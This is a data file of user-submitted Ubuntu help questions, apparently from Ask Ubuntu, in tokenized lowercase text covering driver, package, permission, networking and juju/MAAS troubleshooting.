519227	scheduler not working on kubuntu	i installed gnome scheduler because i wanted to easily schedule some tasks in kubuntu instead of using crontab in the command line but for some reason it dose n't start up i 've tried doing upgrades and updates from the terminal t it 's not working i hope it dose n't have anything to do with kde because i 'm running kubuntu i also want to know if there is a way of starting it using the command line.thanks
519232	how to automatically use external monitors when laptop docked ?	i have a dell latitude e6430 and it used to automatically switch to the external monitors when docked or on restart but sometime since updating to 14.04 this functionality no longer works .
519233	what license are the ubuntu wallpapers distributed under ?	i have n't found the licensing data for the forever by shady s wallpaper , which would be very helpful as i am interested in uploading it to a wiki , hence a cc-by-sa license would be desirable .
519240	usbview error on startup	i was trying to use the usbview program when i got this message error message after trying to start the program : verify that you have usb compiled into your kernel , have the usb core modules loaded , and have the usbdevfs filesystem mounted . after this its more or less up to the user so i really do n't know what to do ?
519244	download problem-i do n't have disc drive . i press 12 but it does n't use the usb stick	i downloaded the package from ubuntu . when i open the file from the download page , it asks to burn into a disc drive . my computer does n't have a disc drive . i have an 8gb usb stick attached to the computer . the download instructions say to press the f12 key to burn to the usb stick . i press it and nothing happens . i have a lenovo t440s running windows 7 64-bit . thank you .
519246	what is the difference between echoing strings to a file and pasting to it ?	today i tried to add virtualbox repo to the /etc/apt/sources.list.d/virtualbox.list via echo `` deb http : //download.virtualbox.org/virtualbox/debian trusty contrib '' > /etc/apt/sources.list.d/virtualbox.list however error occurs when i apt-get update : e : malformed line 1 in source list /etc/apt/sources.list.d/virtualbox.list ( dist parse ) e : the list of sources could not be read . it ca n't be wrong with the string , because if i copy/paste the repo string into a new list file , apt-get update works perfectly . i even try to diff two list file , and the result is even unexplainable : diff virtualbox.list virtualbox.list 1c1 < deb http : //download.virtualbox.org/virtualbox/debian trustyâ contrib -- - > deb http : //download.virtualbox.org/virtualbox/debian trusty contrib as the result , diff shows line 1 has different , but where exactly is the different ? i do n't think it 's to do with malformed issue , but have no idea why . please give me some idea or hints , many thanks ! !
519247	getting `` no such file or directory '' bash error when trying to compile a file	i have already checked out the many similar questions on this website , but i keep getting this error when trying to run my program conversion.cpp with ./conversion . the program is here : ( i ca n't seem to copy paste the text ) whenever i run the program , i get the error that there is no such file or director . i have already tried chmod to no avail . any help would be great appreciated !
519248	ubuntu 14.04 multi card reader not working	i would like to know if someone knows about this problem . i have a laptop asus x200ma and when i installed the ubuntu 14.04.1 lts the slot of the sd card reader never worked again . if someone can help me please ! i do n't want to go back to windows 8 .
519253	ram allocation on pc	i am planning to buy a windows laptop with 8gb ram running win7 64bit os . need your help to understand before i buy this . qst : my requirement is ubuntu should run on 8gb ram . if i install ubuntu , can i allocate all the pc ram to it ? your help will be very appreciated . thanks .
519254	lost premisssions after editing sudoers file	please , can someone help me . the problem : i would like to give permissions to reboot for users not from admin group . on the internet i found the advice to change the `` sudoers '' file with command `` visudo '' . user all = ( all ) ... /reboot , ... /shutdown i changed and lost all administrative rights : - ) i booted from livecd and returned `` sudoers '' to original state , but the administrative grants did n't appeared . after that , i changed `` sudoers '' again and get permissions to start command with sudo prefix . me all = ( all ) all user all = ( all ) all but now i can not install any software because i have to enter the root password . now i have two questions . how can i return my administrative rights ? how do i prevent users from the administrators group can restart the computer . system : lubuntu 14.04
519256	how to find valid static ip address ?	i am about to set up a pc with ubuntu server 14.04.1 . i want to assign it a static ip address . how can i find a valid ip address that is not already being used ? is there a way to do that from terminal ?
519258	i can not enter data in korganizer	i just installed korganizer 4.8.5 . i read the manual and then tried to enter 1 ) event 2 ) todo . it seemed to accept the data , but nothing appeared in calendar or todo list.it all seems very simple , but i am not getting anywhere . i am new to ubuntu . what am i doing wrong ?
519260	how to find out a specific string on https : //translations.launchpad.net ?	sometimes i like to offer translation suggestions for strings in my native language on https : //translations.launchpad.net/ubuntu . normally , to find out a specific string in launchpad translations , first i try to find out the package of the program which produces/uses that string , then i go on launchpad translations at that package page and i use the search field from the page for that string . most of the times this method works , but there are cases when it is not working . let me give you an example from terminal : $ rm blabla the output in english in this case ( my case ) is : rm : can not remove blabla : no such file or directory so , first i found out that rm is in coreutils package , then on launchpad translations at coreutils package page , i searched for can not remove and i found it : https : //translations.launchpad.net/ubuntu/trusty/+source/coreutils/+pots/coreutils/fr/+translate ? batch=10 & show=all & search= can not +remove but when i searched for no such file or directory nothing has been found : https : //translations.launchpad.net/ubuntu/trusty/+source/coreutils/+pots/coreutils/fr/+translate ? batch=10 & show=all & search=no+such+file+or+directory any idea where can i find in this case the no such file or directory string on https : //translations.launchpad.net to offer translation suggestions for it ? any help will be appreciated .
519261	slow and incorrect sizing after a force restart	i have had ubuntu 14.04 installed on my laptop for nearly 5 months but as of yesterday when i force shut down the laptop with my external monitor plugged in everything has been large and slow and the cpu being at 70 % in resources . could someone explain how this could 've happened just from the laptop being force shut down with a monitor plugged in and secondly how do i fix it ? thank you . laptop : hp pavillion pc laptop monitor : hp 2011x cord type : vga
519263	ca n't login to 14.04 after upgrading from computer prompt from 12.04	i upgraded to 14.04 from 12.04 and i ca n't login . when i press ctrl +alt+f1 and then ctrl+alt+f7 i get a purple screen with the the dots on the bottom but they do n't flash and the screen is locked that way no visible login for administrator or guest i then just tried ctrl+alt+f1 and tried to log in but it does n't accept my user name and password what can i do i hate to reload and loose all of my info
519264	problems running logisim on ubunu 12.04	i have been having problems running logisim on ubuntu . at first it worked fine but now it just gets stuck `` creating a file ... '' when i run the program . i 've tried downloading another .jar and running ... nothing its been like this for over 1h..
519267	usb not working	my usb ports are not working since yesterday . the power is supplied ( my phone is charging ) but the device is not mounted in system . also wireless mouse and keyboard are not working , so as pendrive . lsusb bus 002 device 002 : id 8087:8000 intel corp . bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:8008 intel corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
519270	integrating apache tomcat in netbeans 8	i need to integrate tomcat in netbeans 8 . i tried this installed tomcat7 via terminal . but the webapp manager is not found when a refer to localhost:808/manager/html so i removed it . but still localhost:8080 shows tomcat7 starting page why ? ? i needto completely remove the tomcat7 . i tried purge . again same problem . now downloaded apache tomcat from official website and refer it to netbeans . ( as in windows ) but the localhost:8080 still shows tomcat7 . how caan i remove tomcat7 completely ? ? how can i integrate tomcat to netbeans . ? ?
519272	how can i define machine when i try to add units on juju web interface ?	here is the situation : i have my charm deployed using juju and maas . when i try to add units using the gui for the same charm the machine incrementally goes from machine # 1 to machine number # n ( n is number of units added ) where can i force juju to run my units on particular machine or same machine as first unit ? i know one solution is using the cli with juju add-unit your-charm-name -- to < machine-number > . but i need it for juju gui . thanks
519278	how to save windows 's state ?	some time ago i had windows 7 and ubuntu 14.04 . i could enter windows , then turn off ( saving state ) and enter to ubuntu , and after that i could resume windows state . i reinstalled recently , and i ca n't do it , i ca n't enter ubuntu without shutting windows . can i fix this somehow ? thanks to all .
519279	is there a way to pass arguments to be parsed when dpkg -- configure < package > requests user input ?	i 'd like to run dpkg -- configure virtualbox-guest-x11 from within a shell script so it can answer n to the following question . $ dpkg -- configure virtualbox-guest-x11 setting up virtualbox-guest-x11 ( 4.1.12-dfsg-2ubuntu0.6 ) ... configuration file `/etc/x11/xsession.d/98vboxadd-xclient' == > file on system created by you or by a script . == > file also in package provided by package maintainer . what would you like to do about it ? your options are : y or i : install the package maintainer 's version n or o : keep your currently-installed version d : show the differences between the versions z : start a shell to examine the situation the default action is to keep your current version . *** 98vboxadd-xclient ( y/i/n/o/d/z ) [ default=n ] ? is there way i can pass an argument to dpkg -- configure or is there a certain file where i can set the default arguments that should be accepted when the package virtualbox-guest-x11 is configured ?
519284	bash tries to run python on unknown command and fails in py_initialize	running ubuntu 14.04 and updater says that all software is up to date . have tried rebooting . i am preparing for a class that uses python . i have installed it and it works fine . however , i now have this problem : when i type an unknown command into bash , i get a python error : cliff @ climate : ~ $ unknownprogram fatal python error : py_initialize : unable to get the locale encoding file `` /usr/lib/python2.7/encodings/__init__.py '' , line 123 raise codecregistryerror , \ ^ syntaxerror : invalid syntax aborted cliff @ climate : ~ $ env | grep -i python pythonpath=/usr/lib/pymodules/python2.7 : /usr/lib/python2.7 cliff @ climate : ~ $ which unknownprogram cliff @ climate : ~ $ which python /usr/bin/python cliff @ climate : ~ $ python -- version python 2.7.6 cliff @ climate : ~ $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/locââal/games i think that pycharm also installed some python3 on the box . i have found that /usr/lib/command-not-found includes a shebang for python3 . i guess that it is somehow picking up the wrong py_initialize file . how do i correct this since i need python 2.7 for the class ?
519287	wordpress / apache permissions	i have apache and wordpress installed on my ubuntu , everytime i try to upload a widget or anything , i get an error ... tried using.. $ sudo chmod 777 /var/www* but still nothing.. any advice ? unable to create directory wp-content/uploads/2014/09 . is its parent directory writable by the server ?
519291	can not use keyboard nor mouse to wake up ubuntu 14.04 lts	i have a dell dimension 9200 desktop with windows 8 and ubuntu installed side by side . keyboard will wakeup windows 8 from sleep but ubuntu will only wake up when i press the power button . tried cat /proc/acpi/wakeup device s-state status sysfs node vbtn s4 *enabled pci0 s5 *disabled no-bus : pci0000:00 pci4 s5 *disabled pci:0000:00:1e.0 pci2 s5 *disabled pci:0000:00:1c.0 pci3 s5 *disabled pci1 s5 *disabled pci:0000:00:01.0 pci5 s5 *disabled pci:0000:00:1c.4 pci6 s5 *disabled usb0 s3 *enabled pci:0000:00:1d.0 usb1 s3 *enabled pci:0000:00:1d.1 usb2 s3 *enabled pci:0000:00:1d.2 usb3 s3 *enabled pci:0000:00:1a.0 usb4 s3 *enabled pci:0000:00:1a.1 looks like all the usb ports were enabled so i do n't know where else to look for now . any help is appreciated .
519292	in xubuntu 14.04.1 , customizing date & time display	in xubuntu 14.04.1 , how do you enlarge the font size of the date and time in the top right panel area ?
519293	cinnamon : titlebar in panel ?	i hope i can ask cinnamon questions here . one thing i really liked about unity is that the titlebar and buttons for windows were in the top panel , i was wondering if i could have that same effect in cinnamon ?
519295	after installing cuda on ubuntu 14.04 and restarting , got message about failure to install nvidia-340	i installed cuda 6.5 on ubuntu 14.04 , and after rebooting got a message saying the installation of nvidia-340 failed . i did n't install a driver along with cuda ( yet ) although some installation instructions implied it may well be necessary . everything display still works as usual after the restart and error message . why would this error message show , and would i really need to install a driver along with installing that version of cuda ? the faq says an option will be displayed to replace my display driver along with the cuda installation , which i do n't recall happening ( well , admittedly it was late at night ... ) . so i 'm a bit puzzled about all this driver integration . conversely , how should i determine if cuda is good to go and everything is already just in place , in the most straightforward way ?
519298	some keys are not processed	i have recently upgraded ubuntu 12.04 to 14.04.01 . after the upgrade my computer was n't able to start , so i have installed lubuntu 14.04 on the partition where ubuntu 12.04 was before . everything went well , i was able to install proprietary drivers , so i have installed package ubuntu-desktop and gdm , and switched from lxde to ubuntu window manager . but now , one of the accounts ( other two are fine ) on this machine has some strange issue . when ubuntu is used , then keys r and that one which is between t and u are `` dead '' . by dead i mean that in any editor/browser you can press this key but it does n't appear on the screen . in czech we have two keyboard mappings , so between t and u could be y or z . and it 's really only this particular key , it does n't matter whether there is y or z . when the some account and lxde is used instead , then everything is again fine . so for recapitulation : - it 's happening only for 1 account out of 3 - it 's happening for this account only in ubuntu and not lxde - if i try different keyboard , it also did n't help i am not able to figure out , what is happening there . do you have any idea what could be the issue ? thanks
519299	can someone help me install this program onto ubuntu ?	i recently converted to ubuntu , and i 'm still figuring out how to work around things . i 'm a student in school and i am required to use a certain software called armsim # from here http : //armsim.cs.uvic.ca/documentation.html i found this documentation on their website that was titled for linux and mac but i ca n't find the linux instructions anywhere . are the instructions the same for linux ? http : //armsim.cs.uvic.ca/attachedfiles/armsimonmacinstruction.pdf thank you for your time .
519300	restoring 12.04 backup on 14.04 fresh installation	i have a dedicated server running 12.04 . the hardware configuration is not strong enough and i want to upgrade to better hardware . unfortunately the new dedicated server is only compatible with 14.04 . so my question is what should i exclude from my 12.04 backup in order to avoid messing the 14.04 installation ? i usually backup everything except /proc /sys and /mnt . would that be ok or do i need to exclude more files ?
519305	npm install does not create subfolder in node_modules	i am having some weird issues . i just installed ubuntu 14.04 and trying to get cordova working . so i first installed some basic stuff ( apache2 , mysql-server , etc ) and then installed npm ( sudo apt-get install npm ) . thats all fine , i have a node_modules directory now with a node folder in it . that folder contains package.json . now i am trying to install cordova ( npm install -g cordova ) , the download goes well and there are no errors . at the end it references to node_modules/cordova/* when checking this directory , it does not seem to appear . npm_modules is in my /var/www/ dir if that matters . i used sudo for all commands .
519306	unable to change file permissions on external hard drive , 14.04	ever since i changed over to 12.04 ( jul 2014 ) and then 14.04 ( aug ) i have been unable to change the permissions of files on an external hard drive . even though i am the owner and have rwx permission on both the drive and the folder that contains the file , i can not make the file executable ( even using sudo ) . i have tried to do so from the command line and in nautilus . all executable files i copy to the drive , lose their executable status . any suggestions ?
519308	bcm4352 offical dell driver installation problem	i 've downloaded dell ubuntu 12.04 drivers and un-tar the package . then enter the approprite folder to install as specified in first and one answer this question . first i 've installed it with double clicking and it gave an error after that removed it and install on terminal again and it gave the same error again . terminal output ; root @ dell-p-m4800 : /media/data/linux - yedek/m4800_m6800_a03.fish.tar/m4800_m6800_a03.fish/debs # dpkg -i bcmwl-kernel-source-dw1550.deb selecting previously unselected package bcmwl-kernel-source . ( reading database ... 467738 files and directories currently installed . ) unpacking bcmwl-kernel-source ( from bcmwl-kernel-source-dw1550.deb ) ... setting up bcmwl-kernel-source ( 6.30.223.64somerville1 ) ... loading new bcmwl-kernel-source-6.30.223.64somerville1 dkms files ... first installation : checking all kernels ... building only for 3.13.0-35-generic building for architecture x86_64 building initial module for 3.13.0-35-generic error ! bad return status for module build on kernel : 3.13.0-35-generic ( x86_64 ) consult /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/make.log for more information . dpkg : error processing bcmwl-kernel-source ( -- install ) : subprocess installed post-installation script returned error exit status 10 errors were encountered while processing : bcmwl-kernel-source make.log file ; dkms make.log for bcmwl-kernel-source-6.30.223.64somerville1 for kernel 3.13.0-35-generic ( x86_64 ) tue sep 2 22:42:24 eest 2014 make -c /lib/modules/3.13.0-35-generic/build m=/var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-35-generic' cfg80211 api is prefered for this kernel version using cfg80211 api cc [ m ] /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/shared/linux_osl.o cc [ m ] /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.o /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c : in function ‘wl_tkip_printstats’ : /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3237:7 : warning : passing argument 1 of ‘wl- > tkipmodops- > print_stats’ from incompatible pointer type [ enabled by default ] wl- > tkip_bcast_data [ idx ] ) ; ^ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3237:7 : note : expected ‘struct seq_file *’ but argument is of type ‘char *’ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3240:4 : warning : passing argument 1 of ‘wl- > tkipmodops- > print_stats’ from incompatible pointer type [ enabled by default ] wl- > tkipmodops- > print_stats ( debug_buf , wl- > tkip_ucast_data ) ; ^ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3240:4 : note : expected ‘struct seq_file *’ but argument is of type ‘char *’ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c : in function ‘wl_reg_proc_entry’ : /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3461:2 : error : implicit declaration of function ‘create_proc_entry’ [ -werror=implicit-function-declaration ] if ( ( wl- > proc_entry = create_proc_entry ( tmp , 0644 , null ) ) == null ) { ^ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3461:22 : warning : assignment makes pointer from integer without a cast [ enabled by default ] if ( ( wl- > proc_entry = create_proc_entry ( tmp , 0644 , null ) ) == null ) { ^ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3466:16 : error : dereferencing pointer to incomplete type wl- > proc_entry- > read_proc = wl_proc_read ; ^ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3467:16 : error : dereferencing pointer to incomplete type wl- > proc_entry- > write_proc = wl_proc_write ; ^ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.c:3468:16 : error : dereferencing pointer to incomplete type wl- > proc_entry- > data = wl ; ^ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build/src/wl/sys/wl_linux.o ] error 1 make [ 1 ] : *** [ _module_/var/lib/dkms/bcmwl-kernel-source/6.30.223.64somerville1/build ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-35-generic' make : *** [ all ] error 2 there are some pointer or type errors as far as i am concerned . how can i fix this problem ? must i change the code ? or is this a kernel version problem ? thanks .
519309	python download just mp3 from youtube	i want just to download mp3 tracks from youtube , i know that services like youtube-dl download first an .mp4 and then they convert it . is it possible to download just a .mp3 in a 256 kb/s format ? if you can , please post a python script or a library which is able to do that . thanks !
519315	how to create a bios update usb ? ( toshiba nb10t series )	after a few days struggle with installing ubuntu and trying to make it boot , i have discovered that toshiba has made an update for their buggy uefi fifirmware ( http : //support.toshiba.com/support/viewcontentdetail ? contentid=4006298 ) . my laptop runs on the 1.0 version and i would like to update it to the newest one ( which supposedly would fix my problems with boot and even allow to switch into bios-legacy mode ) . the problem is : this bios update is made for windows and my laptop has no windows and currently does n't boot linux neither . while opening it at an other windows pc it allows only to either install the update directly or make a cd/dvd . my laptop has no cd entry . i have tried making a live usb out of the provided iso image ( using unetbootin in windows ) , but it wo n't boot . any ideas how can i create a bootable usb with bios update ? edit : i made my ubuntu work ( using gummiboot ) . is there any way to update the firmware ( bios ) from ubuntu ? edit 2 : i know about this method : how to flash a bios when only a windows binary is provided ? this is still however a cd/dvd install , is it possible to do a bootable usb instead ? or should i search for an external cd reader ?
519317	relation between hooks and service 's units in juju	is the relation between hooks and services 's units one-to-one or one-to-many ? consider : i have one charm as a service in juju . if i add another unit to same service , the system creates another hook for that new unit ? or new unit uses same hook ? thanks
519319	hangouts floating in the middle of the screen	i am using ubuntu 14.04.1 lts gnome shell 3.10.4 hangouts will on occasion decide that the bottom of my desktop is in the middle of the page and the chat windows will stay in the middle when minimized and then when i am working they will pop up each time i scroll over them as they would if they were at the bottom of the screen . another similar issue that may be related that i can think of where a program can not recognize the correct section of my desktop is in pinta . when using the selection tool to try and crop an image the tool grabs seemingly whatever it wants outside or inside the selection and seemingly has no idea what i selected . never any issues with trying to click links or any other items to note .
519321	my systems a mess.. multiple dpkg problems	sorry in advance , my first post so not sure how much to elaborate . also novice bioubuntu user . our machine 64bit ubuntu 12.04.4 lts linux version 2.6.32-57-generic ( buildd @ brownie ) ( gcc version 4.4.3 ( ubuntu 4.4.3-4ubuntu5.1 ) ) when trying to install new programs on our server i ran into some dependancy troubles , so ran dpkg -c : sudo dpkg -c [ 11:54pm ] the following packages are only half configured , probably due to problems configuring them the first time . the configuration should be retried using dpkg -- configure or the configure menu option in dselect : initramfs-tools tools for generating an initramfs long story short : sudo dpkg -- configure initramfs-tools [ 12:03am ] setting up initramfs-tools ( 0.99ubuntu13.5 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-2.6.32-58-generic e : /usr/share/initramfs-tools/hooks/casper failed with return 1. update-initramfs : failed for /boot/initrd.img-2.6.32-58-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools so , hope someone has a solution for us ... thanks salem , apt-cache policy output : casper : installed : 1.315.1 candidate : 1.315.1 version table : *** 1.315.1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main packages 100 /var/lib/dpkg/status 1.315 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main packages ubiquity : installed : 2.2.27 candidate : 2.10.29 version table : 2.10.29 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main packages 2.10.16 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main packages *** 2.2.27 0 100 /var/lib/dpkg/status casper : installed : 1.315.1 candidate : 1.315.1 version table : *** 1.315.1 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise-updates/main packages 100 /var/lib/dpkg/status 1.315 0 500 http : //gb.archive.ubuntu.com/ubuntu/ precise/main packages bioaro @ bioaro-desktop [ siraitia_moleculo ] python [ 11:10am ] python 2.7.7 ( default , jun 2 2014 , 12:37:26 ) [ gcc 4.4.7 ] on linux2
519323	rescue data from corupted fat32 micro sd card	i used it on android and it just stopped working . i want to extract data before i format it . here 's the output of sudo dosfsck -w -r -l -a -v -t /dev/mmcblk0p1 : fsck.fat 3.0.26 ( 2014-03-07 ) fsck.fat 3.0.26 ( 2014-03-07 ) checking we can access the last sector of the filesystem boot sector contents : system id `` android `` media byte 0xf0 ( 5.25 '' or 3.5 '' hd floppy ) 512 bytes per logical sector 32768 bytes per cluster 32 reserved sectors first fat starts at byte 16384 ( sector 32 ) 2 fats , 32 bit entries 2022912 bytes per fat ( = 3951 sectors ) root directory start at cluster 2 ( arbitrary size ) data area starts at byte 4062208 ( sector 7934 ) 505668 data clusters ( 16569729024 bytes ) 16 sectors/track , 4 heads 0 hidden sectors 32370688 sectors total checking file / / contains a free cluster ( 2 ) . assuming eof . fat32 root dir starts with a bad cluster ! is it possible to save data ? thanks !
519324	transmission keeps crashing when a web seed is connected	for some reason transmission is crashing when i download a torrent file with a web seed . for example : i wanted to download the netrunner 14 release as a torrent file and transmission said there was 1 web seed . however when downloading the file transmission is crashing constantly and i 'm not able to download the file with a active web seed as a torrent . when downloading a random torrent file without a web seed it will behave perfectly as it should be . more people here that have the same with transmission ?
519326	i can ping but ca n't browse	i have xubuntu 14.04 with the latest update and having issues connecting to the university 's network . i 'm running xubuntu on my chromebook and the internet works at home but i just started school and i 'm on campus at the moment and ca n't get it to work . i went to the school 's tech support but no one has any experience with xubuntu or linux . i am able to get the internet to work on my android tablet and on my chromebook when running chrome . i do n't have any proxy settings or ever set any and i have tried different browsers . i was able to ping google and no packets were loss . i 'm wondering if it could it be on the university 's side because they have a program that sets up the internet for mac and windows but not linux . i set it the network connection manually and tried different security settings .
519327	what driver am i using ? i need to reinstall it	i need to find the name of the driver that manages my external monitor , then i need to reinstall it . i am new to linux and i do n't know where to find it and how to reinstall it . the monitor is showing horizontal lines after some time ( 15m-1hour ) of work . it looks as if the signal was really bad . i am on ubuntu 14.04 and the monitor is an old samsung 510n .
519328	upgrade help needed	i 'm having trouble upgrading my system . i get an error code that says : use sudo apt-get clean but it has n't worked , no errors pop up but it has n't solved the problem . when i run df -h i get : brandon @ brandon-inspiron-5720 : ~ $ df -h filesystem size used avail use % mounted on /dev/mapper/ubuntu -- vg-root 911g 6.2g 859g 1 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 2.9g 4.0k 2.9g 1 % /dev tmpfs 583m 1.2m 582m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.9g 884k 2.9g 1 % /run/shm none 100m 68k 100m 1 % /run/user /dev/sda1 236m 162m 63m 73 % /boot please help me because i have 216m needing to updated !
519331	where o where are mounts specified in ubuntu if not in /etc/fstab or /lib/init/fstab ?	i just inherited some ubuntu boxes . trying to dope out what 's what . possible emphasis on the word 'dope ' ... i can not figure out why 'df -h ' lists the filesystem sizes that it does . i want to change the values - such as grow /run - and i 'd like my change to survive a reboot . and i can not find where the kernel is picking up 5.9g for /run on 1 box and 3g on another box ... i could use a little help here . thanks
519332	how do i reinstall a video driver	i 've read similar questions on this topic but they have no useful answers . i need to reinstall the video driver becouse my external monitor is showing disturbing horizontal lines . maybe reinstalling the drivers will solve the problem . when i do lshw -c video , i get that the driver is i915 .
519334	evolution calendar error	evolution will not sync with my google , every time i reinstall the same error apears ; that is for authentication with my gmail , when i put in the correct password it refuses to work , saying that the password i put in was wrong , is there a way i can sort this out ?
519335	wireless networks problems	i have wireless network at home and at my university . at home , wireless networks gets connected automatically and never ask me for password whenever i login to computer . also it never ask for password if wifi gets disconnected . so i am happy with this 'automatic connection ' . however at wifi in university , i need to run python script every time when i login to computer . and if wifi get disconnected and it keep asking for password . both wifi are secured . can you please tell me how should i change setting so that wifi in university will get connected automatically and will never ask me for password even if it gets disconnected in between .
519336	is it possible to `` stop '' a particular unit in juju ?	i need to `` stop '' a unit in juju . remove or destroy are not good options for my case , is there any way for `` stop '' ing a unit ?
519337	questions from a new linux user	i have just installed ubuntu 14.04.1 on my lenovo g50 and i have some issues i hope to get help with . perhaps i 'm over my head here but i will get through it . first of all , i ca n't activate wireless . i get the message : network service discovery disabled . your current network has a .local domain , which is not recommended and incompatible with the avahi network service discovery . the service has been disabled.` it also says that the wireless is disabled by hardware switch and i cant seem to activate it in any way . i ca n't seem to find a dedicated hardware switch on my computer . second problem is that multi touch like two-fingerscrolling , and such , does n't work . i haave looked online but i have no experience from linux so the info online is not that easy to comprehend for me . is there anyone who can help me with this in an easy to understand manner i would be eternally grateful .
519338	happy medium between ubuntu and cinnamon ?	i am very new to linux distros and have been tinkering around . i 'm currently using cinnamon after a few weeks on ubuntu 's unity . i really like unity and i 'm not too fond of cinnamon , but i like the customization cinnamon offers , the only thing is the one feature i really like , the top panel acting as a menubar , is not in cinnamon and apparently ca n't be . it 's a really petty reason to drop an os , but i also prefer unity 's software store . i was wondering if there 's a distro that has unity 's overall look and feel , but offers the customization that cinnamon has ?
519341	maas node not pxe booting	i 'm having an issue so far with getting my first node to boot ... it connects to the maas server and begins the boot procedure but then hangs because it is unable to find the correct kernel image boot . the error message that i receive is `` could not not find kernel image : amd64/generic/trusty/no-such-image/boot-kernel '' the screen then sits at a boot prompt . i am very new at this and am not sure what files need to be change or where and if i have buggered something up or need to revert it back to its original ... someone please give me some guidance as its very unclear every where i have looked online .
519342	whats going on underneath here in error redirection ?	while reading about linux i got the following ... . because stderr is not the same as stdout , error messages will still be seen on the terminal windows in the above example . if you want to redirect stderr to a separate file , you use stderrâs file descriptor number ( 2 ) , the greater-than sign ( > ) , followed by the name of the file you want to hold everything the running command writes to stderr : $ do_something 2 > error-file a special shorthand notation can be used to put anything written to file descriptor 2 ( stderr ) in the same place as file descriptor 1 ( stdout ) : 2 > & 1 $ do_something > all-output-file 2 > & 1 bash permits an easier syntax for the above : $ do_something > & all-output-file here do_something is any command ( suppose ) , i am really not getting what is happening underneath , , in all 3 commands stated above , ,i know & is used for making a process a background process.. but i am not getting the logic.. i am new to this flavor please can someone explain me about this ?
519346	properly installing cisco secure mobility client on xubuntu 14.04.1	i was following the steps documented here : https : //faq.oit.gatech.edu/content/how-do-i-install-cisco-anyconnect-client-linux according to what i found : http : //rbgeek.wordpress.com/2013/03/05/cisco-anyconnect-vpn-client-installation-on-ubuntu-12-04-lts/ it seems like the ia32-libs is needed to successfully install the cisco anyconnect . so i ran these commands : sudo dpkg -- add-architecture i386 sudo apt-get install ia32-libs sudo apt-get install lib32z1 by running those three commands , i was able to install the dependencies and download the linux x86_64 vpnsetup shell file from cisco website . the i ran these commands to install : chmod 755 vpnsetup.sh sudo ./vpnsetup.sh i got the messge : installing cisco anyconnect vpn client ... extracting installation files to /tmp/vpn.h6qp7o/vpninst443132940.tgz ... unarchiving installation files to /tmp/vpn.h6qp7o ... starting the vpn agent ... done ! but i can not seem to find it anywhere on my laptop ... it 's not in internet , application , etc i 've search all applications but it 's not showing . can someone help me out ?
519348	pulseaudio problems ( only showing dummy output )	i have always avoided using pulseaudio because of how problematic it is , but since skype 4.3 has now dropped alsa support , i am forced to use pulseaudio , but one problem ; it just does n't work . i ca n't remove it because skype will not work without it ( as far as i 'm aware ) and only show virtual devices in the audio options . it is only showing dummy output devices and no input devices despite having a built-in microphone . is there any way to fix this , or better yet is there any way to use skype without pulseaudio ?
519352	paging standard out using 'more ' , and piping to syslog	i 've implemented a wrapper script which causes all commands executed via this wrapper script to log ( via rsyslog ) things such as the execution time , the user that ran the command , and the exit code . i am trying to implement paging and i have encountered a problem with the 'more ' command . the root of my problem is that 'more ' seems to quit when it is piped to another program , e.g . echo -e `` this\nis\na\ntest '' | more -3 | cat this will print 4 lines , though if we trim the '| cat ' at the end , then it will pause after printing 3 lines , as expected . admittedly , using 'less ' instead of 'more ' does work , though this does n't have the desired effect as it opens a seperate `` window '' and does n't allow scroll back once it is completed ( i do n't need the ability to scroll backwards in the way that 'less ' allows either ) . my current solution is to use 'head ' and 'tail ' commands to get the effect i want , but there are some other challenges to face their as well . does anyone know the secret to make 'more ' work in the way i envisioned ? suggestions for another paging tool that is simpler ( supports enter , space , and 'q ' actions ) are also welcome . thank you !
519354	what is the recommended way to download ubuntu new releases iso ? torrent or official mirror ?	i want to download the iso file of the new release of ubuntu . what is the recommended way to get it ? via torrent or official mirror ?
